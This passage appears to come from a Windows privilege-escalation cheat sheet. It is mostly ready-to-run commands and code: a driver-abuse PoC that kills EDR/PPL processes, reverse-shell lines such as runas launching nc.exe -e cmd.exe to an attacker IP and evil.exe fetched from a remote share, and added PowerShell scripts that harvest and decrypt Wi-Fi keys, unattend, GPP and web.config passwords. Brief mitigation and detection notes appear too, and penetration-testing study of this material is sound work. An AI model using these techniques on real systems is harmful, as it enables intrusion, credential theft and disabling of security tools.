accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Run at startup
Check if you can overwrite some registry key or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autoruns locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Look for possible third-party weird/vulnerable drivers
driverquery
driverquery.exe /fo table
driverquery /SI
If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:
Arbitrary Kernel Rw Token Theft
For race-condition bugs where the vulnerable call opens an attacker-controlled Object Manager path, deliberately slowing down the lookup (using max-length components or deep directory chains) can widen the window from microseconds to tens of microseconds or more:
Kernel Race Condition Object Manager Slowdown
Registry hive memory-corruption primitives
Modern hive vulnerabilities let you build deterministic layouts, abuse writable HKLM/HKU descendants, and turn metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
Some signed third-party drivers create their device object with a strict SDDL via IoCreateDeviceSecure but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not enforced when the device is opened through a path with an extra component, allowing any unprivileged user to obtain a handle using a namespace path such as:
- \\.\DeviceName\anything
- \\.\amsdk\anyfile (from a real-world case)
Once the user can open the device, privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Example capabilities observed in the wild:
- Return full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
- Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
- Terminate arbitrary processes, including Protected Process/Light (PP/PPL), enabling AV/EDR kill from user land via the kernel.
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#include <windows.h>

#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

// Opening the device through a path with an extra trailing component is what
// sidesteps the DACL when FILE_DEVICE_SECURE_OPEN is missing.
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DWORD ret = 0;  // lpBytesReturned must not be NULL when no OVERLAPPED is supplied
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, &ret, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, &ret, 0);
Mitigations for developers
- Always set FILE_DEVICE_SECURE_OPEN when creating device objects intended to be protected by a DACL.
- Validate the caller context for privileged operations. Add PP/PPL checks before allowing process termination or handle return.
- Restrict IOCTLs (access masks, METHOD_*, input validation) and consider brokered models instead of direct kernel privileges.
Detection ideas for defenders
- Monitor user-mode opens of suspicious device names (e.g., \\.\amsdk*) and unusual IOCTL sequences indicating abuse.
- Enforce Microsoft's vulnerable driver blocklist (HVCI/WDAC/Smart App Control) and maintain your own allow/deny lists.
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
For more information about how to abuse this check:
Writable Sys Path +Dll Hijacking Privesc
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Check for other known computers hardcoded on the hosts file
type C:\Windows\System32\drivers\etc\hosts
Network Interfaces & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Check for restricted services from the outside
netstat -ano #Opened ports?
Route Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP Table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
Firewall Rules
Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)
More commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
The bash.exe binary can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI whether nc should be allowed by the firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
To easily start bash as root, you can try --default-user root
You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows Credentials
Winlogon Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Credentials Manager / Windows Vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log the users in to automatically. At first glance this might look like users can store their Facebook, Twitter, Gmail, etc. credentials so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can use to log users in automatically, which means that any Windows application that needs credentials to access a resource (a server or a website) can make use of this Credential Manager & Windows Vault and use the supplied credentials instead of the user entering the username and password every time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use cmdkey to list the credentials stored on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials. The following example calls a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Using runas with a provided set of credentials (runas prompts for the password interactively; it cannot be passed as an argument).
C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"
Note that mimikatz, LaZagne, CredentialFileView, VaultPasswordView, or Empire's PowerShell modules can also dump these stored credentials.
DPAPI
The Data Protection API (DPAPI) provides symmetric encryption of arbitrary data blobs; within Windows it is predominantly used to protect asymmetric private keys and stored credentials. The encryption key is derived from a user or system secret, which supplies most of the entropy.
DPAPI encrypts data with a symmetric key derived from the user's logon secrets. For system-scoped encryption it uses the machine's domain authentication secrets.
A user's DPAPI master keys are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} is the user's Security Identifier. Each master key file holds a 64-byte random master key, encrypted with a key derived from the user's password; it is this master key that protects the user's credential blobs and private keys. (Note that the files in this directory are hidden and system-flagged: a plain dir in CMD shows nothing, but dir /a, or Get-ChildItem -Force in PowerShell, lists them.)
Get-ChildItem -Force C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Force C:\Users\USER\AppData\Local\Microsoft\Protect\
You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credential files protected by the master key are usually located in:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt them.
You can extract many DPAPI master keys from memory with the sekurlsa::dpapi module (if you are root).
PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a convenient way to store encrypted credentials. They are protected with DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
To decrypt PS credentials from the file containing them you can do:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
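The cmd one-liner above is hard to post-process. The following is an added example, not code from the original page: it runs the same netsh commands from PowerShell and returns one object per profile, so the output can be filtered or exported. It assumes English netsh output (the "All User Profile", "Authentication" and "Key Content" labels are localized on other language packs).

```powershell
# Added example, not code from the original page: the same netsh enumeration as the
# one-liner above, but returning objects. Assumes English netsh output ("All User Profile",
# "Authentication", "Key Content"); adjust the labels on localized systems.
function Get-SavedWifiCredential {
    $ssids = netsh wlan show profiles | ForEach-Object {
        if ($_ -match '^\s*All User Profile\s*:\s*(.+?)\s*$') { $Matches[1] }
    }
    foreach ($ssid in $ssids) {
        $detail = netsh wlan show profile name="$ssid" key=clear
        $auth = $detail | ForEach-Object { if ($_ -match '^\s*Authentication\s*:\s*(.+?)\s*$') { $Matches[1] } } | Select-Object -First 1
        $key  = $detail | ForEach-Object { if ($_ -match '^\s*Key Content\s*:\s*(.+?)\s*$')    { $Matches[1] } } | Select-Object -First 1
        [pscustomobject]@{
            SSID           = $ssid
            Authentication = $auth
            Key            = $key    # $null for open networks and 802.1X/enterprise profiles
        }
    }
}

Get-SavedWifiCredential | Format-Table -AutoSize
```

Enterprise (802.1X) profiles never expose a key here; for those, look at the credentials stored for the EAP method instead.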
Saved RDP Connections
You can find them in HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently Run Commands
HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Remote Desktop Credential Manager
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with the appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI master keys from memory with the Mimikatz sekurlsa::dpapi module
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
This code was extracted from PowerUp:
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
Check if C:\Windows\CCM\SCClient.exe is available.
Installers are run with SYSTEM privileges, and many are vulnerable to DLL sideloading (info from https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Files and Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in the registry
SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys, so you should check whether there is anything interesting in there:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
If you find any entry inside that path it is probably a saved SSH key. It is stored encrypted (with DPAPI) but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
If the ssh-agent service is not running and you want it to start automatically on boot, run:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
It seems this technique isn't valid anymore. I tried to create some ssh keys, add them with ssh-add and log in via ssh to a machine. The registry key HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the use of dpapi.dll during the asymmetric key authentication.
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
You can also search for these files using metasploit: post/windows/gather/enum_unattend
Example content:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
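The passwords in these files are usually Base64. When the element carries PlainText=false, Windows encodes the UTF-16LE password with the literal string "Password" appended, so a naive decode leaves a trailing "Password" on the result. The script below is an added example, not code from the original page: it walks the candidate paths listed above, extracts every Password element regardless of the unattend namespace, and decodes it with that rule, falling back to a plain UTF-8 decode (which is what the sample value above happens to be). The sample answer file it writes to %TEMP% is constructed for the demo.

```powershell
# Added example, not code from the original page: find answer files and decode their
# <Password> values. When <PlainText>false</PlainText>, Windows stores Base64 of the
# UTF-16LE password with the literal "Password" appended; plain Base64 text (as in the
# sample above) is handled as a fallback. The sample answer file written to %TEMP% is constructed.
$CandidatePaths = @(
    "$env:SystemRoot\Panther\Unattend.xml", "$env:SystemRoot\Panther\Unattended.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml", "$env:SystemRoot\Panther\Unattend\Unattended.xml",
    "$env:SystemRoot\System32\Sysprep\unattend.xml", "$env:SystemRoot\System32\Sysprep\unattended.xml",
    "$env:SystemRoot\sysprep\sysprep.xml", "$env:SystemDrive\unattend.xml"
)

function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Encoded)
    # Re-pad the Base64 (copied values often lose or gain '=' characters)
    $b64 = $Encoded.Trim().TrimEnd('=')
    $b64 += '=' * ((4 - $b64.Length % 4) % 4)
    try { $raw = [Convert]::FromBase64String($b64) } catch { return $Encoded }   # not Base64: already clear-text
    foreach ($text in @([Text.Encoding]::Unicode.GetString($raw), [Text.Encoding]::UTF8.GetString($raw))) {
        if ($text -match '^[\x20-\x7E\r\n]+$') {           # first decoding that is printable ASCII wins
            $text = $text.Trim()
            if ($text.EndsWith('Password')) { $text = $text.Substring(0, $text.Length - 8) }
            return $text
        }
    }
    return "<undecodable: $Encoded>"
}

function Get-UnattendCredential {
    param([string[]]$Paths)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $p -Raw } catch { continue }
        # local-name() ignores the urn:schemas-microsoft-com:unattend default namespace
        foreach ($pw in $doc.SelectNodes('//*[local-name()="Password"]')) {
            $valueNode = $pw.SelectSingleNode('*[local-name()="Value"]')
            $encoded = if ($valueNode) { $valueNode.InnerText } else { $pw.InnerText }
            if ([string]::IsNullOrWhiteSpace($encoded)) { continue }
            $parent = $pw.ParentNode
            $user = $parent.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            [pscustomobject]@{
                File     = $p
                Context  = $parent.LocalName            # AutoLogon, LocalAccount, ...
                User     = if ($user) { $user.InnerText } else { '' }
                Password = ConvertFrom-UnattendPassword $encoded
            }
        }
    }
}

# Constructed sample so the functions can be exercised offline
$encodedSample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Passw0rd!' + 'Password'))
$sample = @"
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$encodedSample</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@
$samplePath = Join-Path $env:TEMP 'unattend-sample.xml'
Set-Content -LiteralPath $samplePath -Value $sample -Encoding UTF8
Get-UnattendCredential -Paths ($CandidatePaths + $samplePath) | Format-Table -AutoSize
```

Add the dir /s results from above to -Paths when the answer file lives somewhere non-standard; the decoder does not care where the file came from.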
SAM & SYSTEM backups
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Search for a file called SiteList.xml
Cached GPP Password
A feature that was previously available allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be read by any domain user. Secondly, the passwords within these GPPs were encrypted with AES-256 using a default key that Microsoft published, so any authenticated user could decrypt them. This posed a serious risk, as it could allow users to gain elevated privileges.
To mitigate this risk, a function was developed to scan for locally cached GPP files containing a non-empty "cpassword" field. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security issue.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (prior to Windows Vista) for the following files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
# Decrypt one of these passwords with gpp-decrypt (shipped with Kali)
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
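When gpp-decrypt is not at hand, the decryption is short enough to do in PowerShell: the cpassword is AES-256-CBC with a zero IV under the 32-byte key Microsoft published in MS-GPPREF, Base64-encoded with the padding stripped, and the plaintext is UTF-16LE. The script below is an added example, not code from the original page or from PowerSploit's Get-GPPPassword: it implements that decryption and then scans the cached GPP XML files listed above for non-empty cpassword attributes, returning the account, the decrypted password and the policy's change timestamp.

```powershell
# Added example, not code from the original page: decrypt a GPP cpassword in PowerShell
# with the AES-256 key Microsoft published in MS-GPPREF (so no gpp-decrypt needed), and scan
# the locally cached GPP XML files listed above for non-empty cpassword attributes.
function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    # GPP strips the Base64 padding; restore it before decoding
    $b64 = $Cpassword.Trim()
    $b64 += '=' * ((4 - $b64.Length % 4) % 4)
    $cipher = [Convert]::FromBase64String($b64)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $key
        $aes.IV      = New-Object byte[] 16                                   # all-zero IV per the spec
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $dec = $aes.CreateDecryptor()
        $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
        [Text.Encoding]::Unicode.GetString($plain)                          # plaintext is UTF-16LE
    } finally { $aes.Dispose() }
}

function Get-CachedGppPassword {
    $roots = @("$env:ProgramData\Microsoft\Group Policy\history",
               "$env:SystemDrive\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history")
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Printers.xml', 'Drives.xml'
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($file in Get-ChildItem $root -Recurse -File -Include $names -ErrorAction SilentlyContinue) {
            try { [xml]$doc = Get-Content $file.FullName -Raw } catch { continue }
            foreach ($props in $doc.SelectNodes('//Properties[@cpassword != ""]')) {
                $user = @($props.GetAttribute('user' + 'Name'), $props.GetAttribute('accountName'),
                          $props.GetAttribute('runAs')) | Where-Object { $_ } | Select-Object -First 1
                [pscustomobject]@{
                    File     = $file.FullName
                    User     = $user
                    Password = ConvertFrom-GppCpassword $props.GetAttribute('cpassword')
                    Changed  = $props.ParentNode.GetAttribute('changed')
                }
            }
        }
    }
}

ConvertFrom-GppCpassword 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw'   # the sample from the page
Get-CachedGppPassword | Format-Table -AutoSize
```

The same function works on XML pulled straight from \\<dc>\SYSVOL\<domain>\Policies\ when you are on a domain-joined host, which is what the crackmapexec module automates.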
IIS Web Config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Example of a web.config with credentials:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
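Forms credentials are only one of several places a web.config leaks secrets; connection strings, the identity impersonate element and appSettings are at least as common, and sections that were protected with aspnet_regiis show up with a configProtectionProvider attribute and need aspnet_regiis -pdf on the same host to decrypt. The script below is an added example, not code from the original page: it finds web.config files under the usual roots, pulls credentials from each of those locations and flags the encrypted sections. The sample file it writes to %TEMP% is constructed for the demo.

```powershell
# Added example, not code from the original page: parse web.config files for the usual
# credential locations (connectionStrings, forms credentials, identity impersonation,
# appSettings) and flag sections encrypted with a configProtectionProvider, which need
# aspnet_regiis -pdf on the same host to decrypt. The sample file written to %TEMP% is constructed.
function Get-WebConfigCredential {
    param([string[]]$Roots = @('C:\inetpub', 'C:\xampp', "$env:SystemRoot\Microsoft.NET"))
    $files = foreach ($r in $Roots) {
        if (Test-Path $r) { Get-ChildItem -Path $r -Include web.config -File -Recurse -ErrorAction SilentlyContinue }
    }
    foreach ($f in $files) {
        try { [xml]$doc = Get-Content -LiteralPath $f.FullName -Raw } catch { continue }
        $emit = { param($Kind, $Name, $User, $Secret)
            [pscustomobject]@{ File = $f.FullName; Kind = $Kind; Name = $Name; User = $User; Secret = $Secret } }
        foreach ($n in $doc.SelectNodes('//*[@configProtectionProvider]')) {
            & $emit 'encrypted-section' $n.LocalName '' "(protected by $($n.GetAttribute('configProtectionProvider')))"
        }
        foreach ($cs in $doc.SelectNodes('//connectionStrings/add[@connectionString]')) {
            $cstr = $cs.GetAttribute('connectionString')
            $usr = if ($cstr -match '(?i)(?:user id|uid|user)\s*=\s*([^;]+)') { $Matches[1] } else { '' }
            $pwd = if ($cstr -match '(?i)(?:password|pwd)\s*=\s*([^;]+)')     { $Matches[1] } else { '' }
            if ($pwd) { & $emit 'connectionString' $cs.GetAttribute('name') $usr $pwd }
        }
        foreach ($u in $doc.SelectNodes('//authentication/forms/credentials/user[@password]')) {
            $fmt = $u.ParentNode.GetAttribute('passwordFormat')     # Clear, SHA1 or MD5
            & $emit "forms-credentials ($fmt)" 'user' $u.GetAttribute('name') $u.GetAttribute('password')
        }
        foreach ($i in $doc.SelectNodes('//identity[@password]')) {
            & $emit 'identity-impersonate' 'identity' $i.GetAttribute('userName') $i.GetAttribute('password')
        }
        foreach ($a in $doc.SelectNodes('//appSettings/add[@key and @value]')) {
            if ($a.GetAttribute('key') -match '(?i)pass|pwd|secret|token|apikey') {
                & $emit 'appSettings' $a.GetAttribute('key') '' $a.GetAttribute('value')
            }
        }
    }
}

# Constructed sample web.config so the function can be exercised offline
$sample = @'
<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=db01;Database=app;User Id=svc_app;Password=Winter2024!" />
  </connectionStrings>
  <appSettings>
    <add key="ApiToken" value="tok_live_example" />
  </appSettings>
  <system.web>
    <authentication mode="Forms">
      <forms name="login" loginUrl="/admin">
        <credentials passwordFormat="Clear">
          <user name="Administrator" password="SuperAdminPassword" />
        </credentials>
      </forms>
    </authentication>
    <identity impersonate="true" userName="CORP\svc_iis" password="Spring2024!" />
  </system.web>
</configuration>
'@
$dir = Join-Path $env:TEMP 'webcfg-sample'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
Set-Content -LiteralPath (Join-Path $dir 'web.config') -Value $sample
Get-WebConfigCredential -Roots @($dir, 'C:\inetpub', 'C:\xampp') | Format-Table -AutoSize
```

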